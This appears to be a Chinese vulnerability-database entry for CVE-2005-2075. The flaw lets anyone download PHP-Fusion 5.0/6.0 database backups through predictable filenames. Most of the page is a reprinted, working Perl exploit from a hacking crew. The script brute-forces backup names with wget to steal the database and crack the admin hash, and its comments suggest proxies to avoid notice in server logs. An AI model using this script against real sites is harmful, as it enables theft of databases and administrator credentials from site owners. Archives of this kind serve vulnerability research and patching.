PHP-Fusion 敏感信息泄露漏洞

PHP-Fusion 敏感信息泄露漏洞

漏洞ID 1108892 漏洞类型 未知
发布时间 2005-06-25 更新时间 2005-06-29
图片[1]-PHP-Fusion 敏感信息泄露漏洞-安全小百科CVE编号 CVE-2005-2075
图片[2]-PHP-Fusion 敏感信息泄露漏洞-安全小百科CNNVD-ID CNNVD-200506-223
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1068
https://www.securityfocus.com/bid/89785
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-223
|漏洞详情
PHP-Fusion5.0和6.0版本对web文档根目录下存储的数据库文件访问控制不足,且文件名易于预测,利用此漏洞,远程攻击者可借助对PHP-Fusion6.0版本的administration/db_backups目录下,或PHP-Fusion5.0版本的fusion_admin/db_backups目录下文件名的直接请求来获取敏感信息。
|漏洞EXP
#!/usr/bin/perl
 ######################################################
 #  D A R K   A S S A S S I N S   C R E W   2 0 0 5   #
 ######################################################
 # Dark Assassins - http://dark-assassins.com/        #
 # Visit us on IRC @ irc.tddirc.net #DarkAssassins    #
 ######################################################
 # phpfusiondb.pl; Version 0.1 22/06/05               #
 # PHP-Fusion db backup proof-of-concept by Easyex    #
 # Database backup vuln in v6.00.105 and below        #
 ######################################################
 # Description: When a db (database) backup is made   #
 # it is saved in /administration/db_backups/ on 6.0  #
 # and on 5.0 it is saved in /fusion_admin/db_backups/#
 # The backup file can be saved in 2 formats: .sql or #
 # .sql.gz and is hidden by a blank index.php file but#
 # can be downloaded client-side, The filename is for #
 # example : backup_2005-06-22_2208.sql.gz so what we #
 # can do is generate 0001 to 9999 and request the    #
 # file and download it. If a db file is found an     #
 # attacker can get the admin hash and crack  it or   #
 # retrieve other sensitive information from the db!  #
 ######################################################

 # 9999 requests to the host is alot, And would get noticed in the server log!
 # If you re-coded your own script with proxy support you would be fine.
 # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly   
 # backup the php-fusiondatabase.

 my $wget='wget';

 my $count='0';

 my $target;

 if (@ARGV < 4)
{
 print "n";
 print "Welcome to the PHP-Fusion db backup vulnerabilityn";
 print "Coded by Easyex from the Dark Assassins crewn";
 print "n";
 print "Usage: phpfusiondb.pl <host> <version> <file> <extension>n";
 print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gzn";
 print "n";
 exit();
}

 my $host = $ARGV[0];
 my $ver = $ARGV[1];
 my $file = $ARGV[2];
 my $extension = $ARGV[3];

 if ($ver eq "6") {
       $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
 }

 if ($ver eq "5") {
       $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}

 print "n";
 print "Welcome to the PHP-Fusion db backup vulnerabilityn";
 print "Coded by Easyex from the Dark Assassins crewn";
 print "n";

 print "Host: $hostn";
 print "Directory: $dirn";
 print "File: $file + 0001 to 9999n";
 print "Extension: $extensionn";
 print "n";
 print "Attempting to find a db backup file on $hostn";

 for($count=0;$count<9999;$count++) {

    $target=$host.$dir.$file.sprintf("%04d", $count).$extension;

    system("$wget $target");
 }

# milw0rm.com [2005-06-25]
|受影响的产品
PHP Fusion PHP Fusion 6.0

PHP Fusion PHP Fusion 5.0

|参考资料

来源:SECUNIA
名称:15830
链接:http://secunia.com/advisories/15830
来源:VUPEN
名称:ADV-2005-0888
链接:http://www.frsirt.com/english/advisories/2005/0888
来源:MISC
链接:http://dark-assassins.com/forum/viewtopic.php?t=142

相关推荐: Routed数据注入漏洞

Routed数据注入漏洞 漏洞ID 1105381 漏洞类型 未知 发布时间 1998-10-21 更新时间 2005-05-02 CVE编号 CVE-1999-0215 CNNVD-ID CNNVD-199810-014 漏洞平台 IRIX CVSS评分 6…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享